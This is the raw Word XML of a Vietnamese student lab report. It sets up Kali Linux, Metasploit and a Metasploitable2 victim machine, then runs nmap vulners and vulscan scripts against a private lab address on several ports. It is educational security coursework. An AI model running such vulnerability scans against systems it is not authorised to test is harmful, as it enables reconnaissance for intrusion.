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5B554" w14:textId="649FF092" w:rsidR="009E060C" w:rsidRDefault="009E060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Đinh Quang Hiếu – B19DCAT065</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD04A7" w14:textId="77777777" w:rsidR="009E060C" w:rsidRDefault="009E060C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77273815" w14:textId="0590BB7F" w:rsidR="00F83532" w:rsidRDefault="00370561">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370561">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00370561">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Cài đặt các công cụ, nền tảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348C6F74" w14:textId="79DC6499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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370561">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Cài đặt Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170C496E" w14:textId="236EEC67" w:rsidR="00370561" w:rsidRDefault="00370561" w:rsidP="00370561">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370561">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50A45938" wp14:editId="5B068025">
            <wp:extent cx="5731510" cy="3266440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E08A" w14:textId="42F7BFE1" w:rsidR="00370561" w:rsidRDefault="00370561" w:rsidP="00370561">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037056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62524EC" wp14:editId="6AB87F47">
            <wp:extent cx="5731510" cy="175323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298" w14:textId="08820658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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370561">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kiểm tra và chạy thử bộ công cụ tấn công MetaSploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3A16B0" w14:textId="5AD94AD9" w:rsidR="00370561" w:rsidRDefault="00370561" w:rsidP="00370561">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370561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BB3FB04" wp14:editId="74116840">
            <wp:extent cx="4346409" cy="442722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5494" cy="44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3A60" w14:textId="2679B421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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370561">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tải và cài đặt Metasploitable2 làm máy victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600154E" w14:textId="69A6939F" w:rsidR="00370561" w:rsidRDefault="00370561" w:rsidP="00370561">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370561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3200FED8" wp14:editId="649CAD05">
            <wp:extent cx="5731510" cy="3859530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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2FCD" w14:textId="4534D880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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370561">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tìm địa chỉ IP của máy victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17629339" w14:textId="650135B6" w:rsidR="00370561" w:rsidRDefault="00855BCA" w:rsidP="00370561">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR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A766CF1" wp14:editId="4E2F78B0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1918151</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>992401</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="912600" cy="14400"/>
                <wp:effectExtent l="76200" t="95250" r="97155" b="138430"/>
                <wp:wrapNone/>
                <wp:docPr id="53" name="Viết tay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12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A07E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53" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:148.25pt;margin-top:72.5pt;width:77.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">
                <v:imagedata r:id="rId10" o:title=""/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val="fr-FR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EDEA20E" wp14:editId="0235F362">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-582769</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>118681</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="360"/>
                <wp:effectExtent l="76200" t="114300" r="95250" b="133350"/>
                <wp:wrapNone/>
                <wp:docPr id="52" name="Viết tay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3CA12" id="Viết tay 52" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-48.75pt;margin-top:3.7pt;width:5.7pt;height:1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">
                <v:imagedata r:id="rId12" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00370561" w:rsidRPr="00370561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17C348F8" wp14:editId="14A4CC07">
            <wp:extent cx="5731510" cy="3680460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CA39" w14:textId="5168E80D" w:rsidR="00370561" w:rsidRPr="00965153" w:rsidRDefault="00370561" w:rsidP="00965153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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00965153">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kiểm tra kết nối mạng giữa các máy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409B2D10" w14:textId="0A179A14" w:rsidR="00965153" w:rsidRPr="00965153" w:rsidRDefault="00965153" w:rsidP="00965153">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00965153">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Từ máy victim</w:t>
      </w:r>
      <w:r w:rsidRPr="00965153">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> đến Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467EA0D8" w14:textId="2C710B47" w:rsidR="00965153" w:rsidRDefault="00965153" w:rsidP="00965153">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00965153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6048A155" wp14:editId="08A13B6A">
            <wp:extent cx="5731510" cy="2598420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7E5C" w14:textId="6FBC31F8" w:rsidR="00965153" w:rsidRDefault="00965153" w:rsidP="00965153">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00965153">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Từ máy Kali đến Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D5DD4C" w14:textId="7B2E567B" w:rsidR="00965153" w:rsidRDefault="00965153" w:rsidP="00965153">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00965153">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21803916" wp14:editId="6BC95D93">
            <wp:extent cx="5731510" cy="3191510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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A099" w14:textId="34F5E76C" w:rsidR="00A366A8" w:rsidRDefault="00A366A8" w:rsidP="00965153">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BBEBE8" w14:textId="43607384" w:rsidR="00A366A8" w:rsidRDefault="00A366A8" w:rsidP="00965153">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A366A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A366A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kiểm tra và cài đặt các NSE scripts cho nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9DC25F" w14:textId="5258C209" w:rsidR="00A366A8" w:rsidRPr="00A366A8" w:rsidRDefault="00A366A8" w:rsidP="00A366A8">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A366A8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kiểm tra các NSE scripts có sẵn cho nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3218B9EC" w14:textId="25ABFE10" w:rsidR="00A366A8" w:rsidRDefault="00A366A8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A366A8">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E73F8A6" wp14:editId="711DE137">
            <wp:extent cx="5731510" cy="1379220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7F35" w14:textId="6C1A6A04" w:rsidR="00E10670" w:rsidRDefault="00E10670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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C62095F" wp14:editId="680E6D55">
            <wp:extent cx="5439534" cy="4086795"/>
            <wp:effectExtent l="0" t="0" r="8890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46ED" w14:textId="4FC874A8" w:rsidR="00A366A8" w:rsidRPr="00A366A8" w:rsidRDefault="00A366A8" w:rsidP="00A366A8">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A366A8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Cài đặt CSDL nmap-vulners:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC9E3E1" w14:textId="2B54245C" w:rsidR="00E10670" w:rsidRDefault="00E10670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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BCC11B9" wp14:editId="7ED0A25F">
            <wp:extent cx="5591955" cy="1771897"/>
            <wp:effectExtent l="0" t="0" r="889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65BD" w14:textId="4524BED4" w:rsidR="00E10670" w:rsidRDefault="00E10670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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="237AC80C" wp14:editId="3F3B26E9">
            <wp:extent cx="6993568" cy="110490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99241" cy="11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9A11" w14:textId="53EF084E" w:rsidR="00E10670" w:rsidRPr="00E10670" w:rsidRDefault="00E10670" w:rsidP="00E10670">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:num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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Cài đặt CSDL vulscan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E8DAE" w14:textId="214647EF" w:rsidR="00E10670" w:rsidRDefault="00E10670" w:rsidP="00E10670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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67323A00" wp14:editId="6349CCE5">
            <wp:extent cx="5836920" cy="1664551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8783" cy="169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4E07" w14:textId="3225B83C" w:rsidR="00E10670" w:rsidRDefault="00E10670" w:rsidP="00E10670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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29AB2452" wp14:editId="2DE48096">
            <wp:extent cx="5731510" cy="693420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A30C" w14:textId="47D6C590" w:rsidR="00E10670" w:rsidRDefault="00E10670" w:rsidP="00E10670">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1565FB09" w14:textId="68CAD77E" w:rsidR="00E10670" w:rsidRDefault="00E10670" w:rsidP="00E10670">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10670">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10670">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10670">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Quét máy victim Metasploitable2 tìm các lỗ hổng tồn tại sử dụng NSE script với nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B9F0B0" w14:textId="7ED5FBD2" w:rsidR="00E10670" w:rsidRPr="00E10670" w:rsidRDefault="00E10670" w:rsidP="00E10670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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10670">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nmap --script=vulscan/vulscan.nse -sV -p21</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10670">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.152.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722A979B" w14:textId="36A0FFFF" w:rsidR="00E10670" w:rsidRDefault="008F4CAB" w:rsidP="00E10670">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="fr-FR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989B439" wp14:editId="7F7E54FC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>75671</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1053099</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5590080" cy="202680"/>
                <wp:effectExtent l="76200" t="95250" r="106045" b="140335"/>
                <wp:wrapNone/>
                <wp:docPr id="11" name="Viết tay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5900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2382" id="Viết tay 11" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:3.15pt;margin-top:77.25pt;width:445.8pt;height:2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">
                <v:imagedata r:id="rId23" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00983CC4" w:rsidRPr="00983CC4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61EEB3AF" wp14:editId="2A158E29">
            <wp:extent cx="5731510" cy="4012565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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EFF" w14:textId="2A4ECC60" w:rsidR="00983CC4" w:rsidRPr="00983CC4" w:rsidRDefault="00983CC4" w:rsidP="00983CC4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983CC4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nmap --script=vulscan/vulscan.nse -sV -p22</w:t>
      </w:r>
      <w:r w:rsidRPr="00983CC4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00983CC4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.152.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C033A12" w14:textId="114D10A7" w:rsidR="00983CC4" w:rsidRPr="00983CC4" w:rsidRDefault="008F4CAB" w:rsidP="00983CC4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4849768" wp14:editId="5878A1F5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>94751</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2052734</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5591160" cy="188640"/>
                <wp:effectExtent l="76200" t="114300" r="86360" b="116205"/>
                <wp:wrapNone/>
                <wp:docPr id="19" name="Viết tay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5911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018C6" id="Viết tay 19" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:4.6pt;margin-top:156pt;width:445.95pt;height:26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">
                <v:imagedata r:id="rId26" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00983CC4" w:rsidRPr="00983CC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E9C73DE" wp14:editId="660C7694">
            <wp:extent cx="5731510" cy="3308350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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C0B5" w14:textId="624FFABA" w:rsidR="00983CC4" w:rsidRPr="00983CC4" w:rsidRDefault="00983CC4" w:rsidP="00983CC4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983CC4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nmap --script=vulscan/vulscan.nse -sV -p23</w:t>
      </w:r>
      <w:r w:rsidRPr="00983CC4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.152.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31529F31" w14:textId="7E2D119A" w:rsidR="00983CC4" w:rsidRPr="00983CC4" w:rsidRDefault="008F4CAB" w:rsidP="00983CC4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2092B92" wp14:editId="7932CEA6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>78191</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>901364</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3494520" cy="95400"/>
                <wp:effectExtent l="76200" t="95250" r="0" b="133350"/>
                <wp:wrapNone/>
                <wp:docPr id="31" name="Viết tay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945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78262" id="Viết tay 31" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:3.3pt;margin-top:65.3pt;width:280.8pt;height:18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">
                <v:imagedata r:id="rId29" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F150F2"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5DA157A5" wp14:editId="3F71FEAB">
            <wp:extent cx="5731510" cy="4300855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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604B" w14:textId="1484F944" w:rsidR="00983CC4" w:rsidRPr="00F150F2" w:rsidRDefault="00983CC4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--script=nmap-vulners/vulners.nse -sV -p21 </w:t>
      </w:r>
      <w:r w:rsidR="00F150F2" w:rsidRPr="00F150F2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.152.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586DB830" w14:textId="63EF5E07" w:rsid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</w:p>
    <w:p w14:paraId="70F716F2" w14:textId="7E2D8FB4" w:rsidR="00F150F2" w:rsidRP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4EEDC7C" wp14:editId="067FBE76">
            <wp:extent cx="5731510" cy="1537970"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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BA9B" w14:textId="2EA2A109" w:rsidR="00983CC4" w:rsidRPr="00F150F2" w:rsidRDefault="00983CC4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--script=nmap-vulners/vulners.nse -sV -p22 </w:t>
      </w:r>
      <w:r w:rsidR="00F150F2" w:rsidRPr="00F150F2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.152.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A77B217" w14:textId="3B0326BC" w:rsidR="00F150F2" w:rsidRPr="00F150F2" w:rsidRDefault="008F4CAB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2F1C12F" wp14:editId="287A3437">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>304631</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>713329</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1365120" cy="158400"/>
                <wp:effectExtent l="76200" t="114300" r="83185" b="127635"/>
                <wp:wrapNone/>
                <wp:docPr id="33" name="Viết tay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651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382D" id="Viết tay 33" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:21.15pt;margin-top:50.5pt;width:113.2pt;height:2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">
                <v:imagedata r:id="rId33" o:title=""/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24255B2" wp14:editId="73EF70C9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>295631</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>942649</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1080720" cy="63360"/>
                <wp:effectExtent l="76200" t="95250" r="0" b="146685"/>
                <wp:wrapNone/>
                <wp:docPr id="32" name="Viết tay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807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A46D" id="Viết tay 32" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:20.45pt;margin-top:68.55pt;width:90.8pt;height:16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">
                <v:imagedata r:id="rId35" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F150F2"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5D62771" wp14:editId="188014A4">
            <wp:extent cx="5731510" cy="2481580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8292" w14:textId="1ED3C8FD" w:rsidR="00983CC4" w:rsidRPr="00F150F2" w:rsidRDefault="00983CC4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>nmap --script=nmap-vulners/vulners.nse -sV -p23</w:t>
      </w:r>
      <w:r w:rsidR="00F150F2" w:rsidRPr="00F150F2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.152.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F7F17" w14:textId="42345D21" w:rsidR="00983CC4" w:rsidRDefault="00F150F2" w:rsidP="00983CC4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44CB6EF" wp14:editId="1A441DB5">
            <wp:extent cx="5731510" cy="1589405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CE5B" w14:textId="2E281369" w:rsidR="00F150F2" w:rsidRPr="00F150F2" w:rsidRDefault="00F150F2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--script=vulscan/vulscan.nse -sV -p80 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F150F2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.152.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D60A9" w14:textId="21CF67FF" w:rsidR="00F150F2" w:rsidRPr="00F150F2" w:rsidRDefault="008F4CAB" w:rsidP="00F150F2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D57303" wp14:editId="4E8D22AD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3849911</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1111285</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="360"/>
                <wp:effectExtent l="76200" t="114300" r="95250" b="133350"/>
                <wp:wrapNone/>
                <wp:docPr id="36" name="Viết tay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375CD" id="Viết tay 36" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:300.35pt;margin-top:81.85pt;width:5.7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">
                <v:imagedata r:id="rId12" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F150F2"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382E763" wp14:editId="5D9DBC26">
            <wp:extent cx="5731510" cy="4942840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F812" w14:textId="636C6F5E" w:rsidR="00F150F2" w:rsidRPr="00F150F2" w:rsidRDefault="00F150F2" w:rsidP="00983CC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7632"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F96228" w14:textId="527594CC" w:rsidR="00F150F2" w:rsidRPr="00F150F2" w:rsidRDefault="00F150F2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--script=vulscan/vulscan.nse -sV -p139 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F150F2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.152.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DA3426" w14:textId="5CFE76D5" w:rsidR="00F150F2" w:rsidRPr="00F150F2" w:rsidRDefault="008F4CAB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921C217" wp14:editId="2B50B372">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>44711</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>853590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5961600" cy="171360"/>
                <wp:effectExtent l="57150" t="95250" r="20320" b="133985"/>
                <wp:wrapNone/>
                <wp:docPr id="34" name="Viết tay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9616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EB1E" id="Viết tay 34" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:.65pt;margin-top:61.55pt;width:475.05pt;height:24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">
                <v:imagedata r:id="rId41" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
